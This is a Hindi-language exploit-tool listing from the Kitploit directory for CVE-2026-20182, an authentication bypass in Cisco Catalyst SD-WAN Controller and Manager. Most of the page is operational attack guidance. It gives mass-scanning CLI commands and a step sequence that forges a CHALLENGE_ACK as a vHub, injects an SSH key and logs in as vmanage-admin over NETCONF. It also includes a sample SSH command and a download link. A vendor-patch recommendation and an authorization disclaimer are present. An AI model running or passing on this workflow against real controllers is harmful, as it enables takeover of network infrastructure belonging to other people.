Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20182 — Cisco Catalyst SD-WAN पीयरिंग प्रमाणीकरण बाईपास | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-20182
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Cisco Catalyst SD-WAN पीयरिंग प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
122 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20182

Cisco Catalyst SD-WAN पीयरिंग प्रमाणीकरण बायपास

CVE-2026-20182 — Cisco Catalyst SD-WAN पीयरिंग प्रमाणीकरण बायपास

Cisco Catalyst SD-WAN Controller / Manager पीयरिंग प्रमाणीकरण बायपास (CVE-2026-20182) के अधिकृत परीक्षण हेतु आकलन उपकरण।

CVECVE-2026-20182
गंभीरताक्रिटिकल (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
उत्पादCisco Catalyst SD-WAN Controller (पूर्व में vSmart) · Cisco Catalyst SD-WAN Manager (पूर्व में vManage)
समस्यापीयरिंग प्रमाणीकरण तंत्र सही ढंग से लागू नहीं किया गया
स्क्रिप्टCVE-2026-20182.py

भेद्यता सारांश

मई 2026 एडवाइज़री: कंट्रोल-कनेक्शन हैंडशेकिंग / पीयरिंग प्रमाणीकरण में एक दोष बिना प्रमाणीकरण वाले रिमोट हमलावर को प्रमाणीकरण बायपास करने और प्रभावित सिस्टम पर उच्च-विशेषाधिकार वाली आंतरिक पहुंच प्राप्त करने की अनुमति देता है।

हमलावर प्रभावित सिस्टम पर निर्मित अनुरोध (crafted requests) भेजता है। सफल होने पर, हमलावर आंतरिक, उच्च-विशेषाधिकार वाले, गैर-root खाते के रूप में प्रमाणित हो सकता है और NETCONF तक पहुंच सकता है, जिससे SD-WAN फ़ैब्रिक कॉन्फ़िगरेशन में हेरफेर संभव हो जाता है।

अनुशंसा: आधिकारिक विक्रेता मार्गदर्शन के अनुसार Cisco सुरक्षा फिक्स लागू करें। प्रबंधन प्लेन (management plane) के एक्सपोज़र को प्रतिबंधित करें, कंट्रोल-प्लेन कनेक्शन की निगरानी करें, और अनधिकृत कॉन्फ़िगरेशन परिवर्तनों के लिए SD-WAN कंट्रोलरों का ऑडिट करें।


संपर्क

Telegram: @KNxploited


कंसोल पूर्वावलोकन

CVE-2026-20182 operations console


टूल: CVE-2026-20182.py

Cisco SD-WAN vdaemon (UDP/DTLS 12346) के विरुद्ध CVE-2026-20182 हेतु Python 3 एक्सप्लॉइट फ्रेमवर्क।

यह क्या करता है (चरण दर चरण)

फ़ैब्रिक फ़ॉलबैक: TEAR_DOWN या पैरामीटर बेमेल पर, --no-fallback न होने तक वैकल्पिक domain/site प्रीसेट (1,100), (1,1), (0,0) के साथ पुनः प्रयास करता है।


परिणाम टियर (ध्यान से पढ़ें)

महत्वपूर्ण

  • check मोड → अधिकतम टियर 03 (बायपास प्रोब)। नहीं पूर्ण एक्सप्लॉइटेशन प्रमाण।
  • full मोड → टियर 01 (ssh_verified) का लक्ष्य रखें।
  • सूची में https://host → केवल TCP वेब संकेत (80/443)। नहीं 443 पर UDP DTLS।

आवश्यकताएँ

root@kitploit:~
pip install -r requirements.txt

OpenSSL (सिस्टम)

Windows

  1. Win64 OpenSSL 3.x या समकक्ष स्थापित करें
  2. bin\ को PATH में जोड़ें, या सेट करें:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

यदि OpenSSL लोड नहीं किया जा सकता तो टूल स्टार्टअप पर बाहर निकल जाता है।


त्वरित आरंभ

इंटरैक्टिव मेनू (डिफ़ॉल्ट)

root@kitploit:~
python CVE-2026-20182.py
  • विकल्प 1–11 कॉन्फ़िगर करें, फिर 0 = स्कैन लॉन्च करें
  • डिफ़ॉल्ट रन मोड: check (सुरक्षित बायपास प्रोब)

नॉन-इंटरैक्टिव (स्वचालन)

root@kitploit:~
python CVE-2026-20182.py -y

रन मोड

CHECK — केवल बायपास प्रोब

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — कुंजी इंजेक्ट करें + SSH सत्यापित करें (केवल अधिकृत लक्ष्य)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

CLI संदर्भ (हर फ़्लैग + उदाहरण)

लक्ष्य और वर्कर

-f / --file — लक्ष्य सूची (डिफ़ॉल्ट: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — वर्कर थ्रेड (1–200, डिफ़ॉल्ट 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — सूची में न होने पर डिफ़ॉल्ट DOMAIN_ID (डिफ़ॉल्ट: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — सूची में न होने पर डिफ़ॉल्ट SITE_ID (डिफ़ॉल्ट: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

मोड और स्वचालन

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — इंटरैक्टिव मेनू छोड़ें; केवल CLI मान उपयोग करें

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

SSH सत्यापन

--no-ssh-verify — इंजेक्शन के बाद का SSH परीक्षण छोड़ें (full मोड में अनुशंसित नहीं)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — 830 के बाद TCP 22 भी आज़माएँ

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / फ़ैब्रिक

--no-try-list-udp — केवल UDP 12346; सूची से :port अनदेखा करें

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — लैब: हर होस्ट पर अतिरिक्त UDP पोर्ट

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — TEAR_DOWN पर domain/site पुनः प्रयास अक्षम करें

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

लॉगिंग

-v / --verbose — प्रत्येक प्रोटोकॉल TX/RX संदेश लॉग करें

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

इंटरैक्टिव मेनू (जब -y छोड़ा जाए)


targets.txt प्रारूप

प्रति पंक्ति एक लक्ष्य। # से शुरू होने वाली पंक्तियाँ अनदेखा की जाती हैं।

उदाहरण फ़ाइल

root@kitploit:~
# Lab controllers — authorized only
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

समर्थित नहीं: IPv6 (केवल IPv4 / होस्टनाम)।


आउटपुट फ़ाइलें

उदाहरण SSH कमांड (टियर 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

अनुशंसित वर्कफ़्लो

1) कई होस्टों की स्क्रीनिंग करें (तेज़)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

cisco_sdwan_03_bypass_only.jsonl और लाइव आँकड़ों में केवल बायपास की समीक्षा करें।

2) शॉर्टलिस्ट किए गए होस्टों पर एक्सप्लॉइट की पुष्टि करें

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

cisco_sdwan_01_confirmed_ssh.jsonl की समीक्षा करें — केवल इसी फ़ाइल में ssh_verified: true होता है।

3) एकल होस्ट का डीबग करें (वर्बोज़)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

लाइव टेलीमेट्री (स्कैन के दौरान)


परिचालन नोट्स

  • डिफ़ॉल्ट मोड check है — यह स्वयं कुंजियाँ नहीं लिखता और न ही SSH साबित करता है।
  • वास्तविक सफलता = केवल full मोड में ssh_verified=true।
  • पैच किया हुआ / गलत फ़ैब्रिक → अक्सर CHALLENGE_ACK के बाद TEAR_DOWN; फ़ैब्रिक फ़ॉलबैक सक्षम करें या सूची में domain/site ठीक करें।
  • फ़ायरवॉल को आपके स्कैनर से कंट्रोलर तक UDP/12346 (और कोई भी अतिरिक्त सूची UDP पोर्ट) की अनुमति देनी चाहिए।
  • sdwan_keys/ या स्कैन परिणामों को सार्वजनिक रिपॉजिटरी में कमिट न करें।

कानूनी अस्वीकरण

यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा अनुसंधान, रक्षात्मक मूल्यांकन और शिक्षा के लिए है।

आपके पास किसी भी ऐसे सिस्टम का परीक्षण करने के लिए स्पष्ट लिखित अनुमति होनी चाहिए जिसके स्वामी या संचालक आप नहीं हैं। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक इस टूल के उपयोग से उत्पन्न दुरुपयोग, क्षति या कानूनी परिणामों के लिए जिम्मेदार नहीं है।

केवल उन्हीं सिस्टम और नेटवर्क पर उपयोग करें जहाँ आपको सुरक्षा परीक्षण करने के लिए स्पष्ट रूप से अधिकृत किया गया है।


द्वारा: Nxploited ( Khaled Alenazi )

टूल डाउनलोड करें
आइटमविवरण
हमला वेक्टरनेटवर्क
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
दायरापरिवर्तित
प्रभावगोपनीयता, अखंडता और उपलब्धता — उच्च
चरणचरणविवरण
1लक्ष्य लोड करेंtargets.txt पार्स करें, (host, domain_id, site_id) के आधार पर डुप्लिकेट मर्ज करें
2OpenSSL प्रीफ़्लाइटकस्टम DTLS के लिए OpenSSL 3.x/4.x शेयर्ड लाइब्रेरी लोड करें
3DTLS कनेक्टलक्ष्य UDP पोर्ट से कनेक्ट करें (हमेशा पहले 12346, फिर वैकल्पिक सूची पोर्ट)
4CHALLENGEसर्वर से CHALLENGE (0x08) प्राप्त करें
5CHALLENGE_ACKनिर्मित CHALLENGE_ACK को vHub (type 2) के रूप में भेजें — प्रमाणीकरण बायपास
6HelloHello एक्सचेंज पूरा करें — बायपास पथ की पुष्टि करता है
7aCHECK मोडयहीं रुकें — केवल बायपास / Hello OK रिकॉर्ड करें (कोई कुंजी नहीं, कोई SSH नहीं)
7bFULL मोडVMANAGE_TO_PEER के माध्यम से SSH सार्वजनिक कुंजी इंजेक्ट करें
8Inject ACKप्रोटोकॉल स्वीकृति के रूप में REGISTER_TO_VMANAGE (0x0D) की अपेक्षा करें
9SSH सत्यापनTCP 830 (NETCONF), वैकल्पिक 22 पर vmanage-admin के रूप में लॉगिन परीक्षण करें
10आउटपुटनिष्कर्षों को टियर फ़ाइलों + मानव-पठनीय कमांड सूची में क्रमबद्ध करें
टियरफ़ाइलअर्थ
01 — पुष्ट SSHcisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — केवल यही टियर पूर्ण समझौते का प्रमाण माना जाता है
02 — केवल Inject ACKcisco_sdwan_02_inject_ack_only.jsonlप्रोटोकॉल ने कुंजी इंजेक्शन स्वीकार किया; SSH लॉगिन विफल
03 — केवल बायपासcisco_sdwan_03_bypass_only.jsonlHello/बायपास OK; कोई पुष्ट इंजेक्शन नहीं
आवश्यकतानोट्स
Python3.9+
pipcryptography, rich
OpenSSL3.x या 4.x शेयर्ड लाइब्रेरी (libssl + libcrypto) — अनिवार्य
मोडफ़्लैगSSH इंजेक्टSSH सत्यापनकब उपयोग करें
CHECK--mode check (डिफ़ॉल्ट)नहींनहींबड़े पैमाने पर स्क्रीनिंग, बायपास पहचान
FULL--mode fullहाँहाँ (जब तक --no-ssh-verify न हो)समझौते का प्रमाण
#विकल्प
1लक्ष्य फ़ाइल
2वर्कर थ्रेड
3डिफ़ॉल्ट DOMAIN_ID
4डिफ़ॉल्ट SITE_ID
5मोड: check / full
6TEAR_DOWN पर फ़ैब्रिक ऑटो-रीट्राय
7वर्बोज़ प्रोटोकॉल लॉग
8इंजेक्शन के बाद SSH सत्यापन
9SSH :22 भी सत्यापित करें
10स्पष्ट सूची UDP पोर्ट आज़माएँ
11अतिरिक्त UDP पोर्ट (लैब)
12सूची प्रारूप सहायता दिखाएँ
0▶ स्कैन लॉन्च करें
प्रारूपउदाहरणव्यवहार
IP / होस्टनाम10.0.0.1UDP 12346 + डिफ़ॉल्ट domain/site
IP + UDP पोर्ट10.0.0.2:12346सूची UDP पोर्ट भी आज़माएँ
IP + पोर्ट + domain + site10.0.0.3:12346:1:100पूर्ण फ़ैब्रिक टपल
HTTPS URLhttps://10.0.0.4होस्ट + केवल TCP 443 संकेत (UDP/443 नहीं)
HTTP URLhttp://10.0.0.5केवल TCP 80 संकेत
UDP URLudp://10.0.0.6:12346स्पष्ट UDP
टैब/कॉमा से अलग किया गया10.0.0.7 12346 1 100चार-फ़ील्ड फ़ॉर्म के समान
कुंजी=मान10.0.0.8;port=12346;domain=1;site=100सेमीकोलन KV सिंटैक्स
फ़ाइलसामग्री
cisco_sdwan_results.jsonlप्रति प्रयास कच्चा JSON परिणाम
cisco_sdwan_success.txtपुष्ट SSH पंक्तियाँ (टैब-सेपरेटेड)
cisco_sdwan_01_confirmed_ssh.jsonlटियर 01 — सत्यापित SSH
cisco_sdwan_02_inject_ack_only.jsonlटियर 02 — inject ACK, SSH विफल
cisco_sdwan_03_bypass_only.jsonlटियर 03 — केवल बायपास / Hello
cisco_sdwan_commands.txtमानव-पठनीय SSH कमांड
cisco_sdwan_findings.jsonसत्र सारांश + गणनाएँ
sdwan_keys/जेनरेट की गई निजी कुंजियाँ (full मोड)
काउंटरअर्थ
प्रगतिपूर्ण किए गए लक्ष्य / कुल
SSH सत्यापितटियर 01 गिनती
Inject ACKटियर 02 गिनती
केवल बायपासटियर 03 गिनती
विफलत्रुटियाँ / कोई बायपास नहीं